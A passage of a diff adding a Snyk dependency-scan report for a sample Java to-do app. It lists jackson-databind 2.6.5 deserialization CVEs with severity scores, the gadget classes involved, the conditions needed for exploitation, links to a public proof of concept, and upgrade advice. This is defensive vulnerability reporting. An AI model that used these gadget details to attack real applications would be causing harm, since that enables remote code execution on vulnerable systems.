"modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + 
